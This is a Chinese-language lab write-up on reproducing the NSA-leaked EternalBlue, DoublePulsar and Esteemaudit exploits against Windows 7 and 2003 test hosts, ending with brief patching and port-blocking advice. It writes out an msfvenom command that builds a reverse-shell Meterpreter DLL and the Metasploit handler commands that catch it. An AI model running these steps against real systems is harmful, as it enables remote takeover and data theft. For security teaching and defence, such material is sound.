【滲透測試】NSA Windows 0day漏洞+修復方案
這個漏洞是前段時間爆出來的,幾乎影響了全球70%的電腦,不少高校、政府和企業都還在用Windows服務器,這次時間的影響力堪稱網絡大地震。
-----------------------------------------------------------------------------------------------------------------------
一、實驗環境
本機IP:172.16.11.2 Windows 2003
本機IP:172.16.12.2 Kali Linux
靶機IP:172.16.12.3 WIN7 64
靶機IP:172.16.12.4 WIindos 2003
一、影響版本
Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Sever 2012 SP0
二、漏洞危害
攻擊者通過執行腳本,使目標主機藍屏重啟,獲取Windows目標主機權限,對目標機器進行任意操作,攻擊成本和利用條件都很低,只需在本地執行腳本,並設置相關參數。一旦攻擊成功,攻擊者能直接控制目標主機,甚至直接下載數據庫,盜取商業機密。
三、復現過程
Eternalblue 可以利用SMB漏洞獲取系統權限
Doublepulsar可以加載Metasploit生成惡意的DLL
1、首先我們要在工具的根目錄下創建一個listeningposts文件夾,否則運行程序時會報錯
2、 運行 fb.py
填入對應信息:
靶機IP
目標IP
取消重定向
指定日誌文件目錄
創建新項目
項目名稱
確認路徑
3、這裏我們已經配置完最基本的信息,需要使用插件
use Eternalblue //使用Eternalblue
4、接下來我們一路回車就OK了,只有幾個需要特殊設置的。要註意選擇的操作系統、系統位數、傳輸方式。我們測試環境是Win7 64 FB傳輸方式,在這裏設置就可以,其他保持默認
5、運行成功後會顯示Eternalblue Successd
------------------------------------------------------------------------------------------------------------------------------------
接下來我們測試另外一種插件
1、用kali生成惡意DLL,我們 /home目錄就會生成win.dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=12399 -f dll >win.dll
2、進入Metasploit,設置TCP監聽端口,用於攻擊成功後返回的Shell
msfconsole use exploit/multi/handler //使用監聽模塊 set payload windows/x64/meterpreter/reverse_tcp //設置payload show options //查看配置信息 set LHOST 172.16.12.2 //設置本地IP set LPORT 12399 //設置本地端口 run //運行
Metasploit已經成功運行,等待Shell的返回
3、將dll文件放到C盤根目錄,使用Doublepulsar來加載生成的dll文件。
這裏系統位數、後們操作、後們路徑 --》 64、RunDLL、C:\win.dll,其他保持默認即可
----------------------------------------------------------------------------------------------------------------------------
使用Esteemaudit插件 驗證3389 RDP漏洞 本靶機地址:172.16.12.4
1、和上述步驟一樣,配置基本信息
2、使用 Esteemaudit插件 這裏講CallbackPort設置為8877端口(其他端口也可以)
3、手動加載 rudo_x86.dll、capa_x86.dll和lipa_x86.dll,因為插件默認選項都在D盤,它不能識別安裝目錄。
4、其他保持默認設置即可
---------------------------------------------------------------------------------------------------------------------
四、漏洞修復方案
使用防火墻過濾或者關閉137/139/445端口
對於3389遠程登錄,至少要關閉智能卡登錄選項
升級補丁,更新系統
【滲透測試】NSA Windows 0day漏洞+修復方案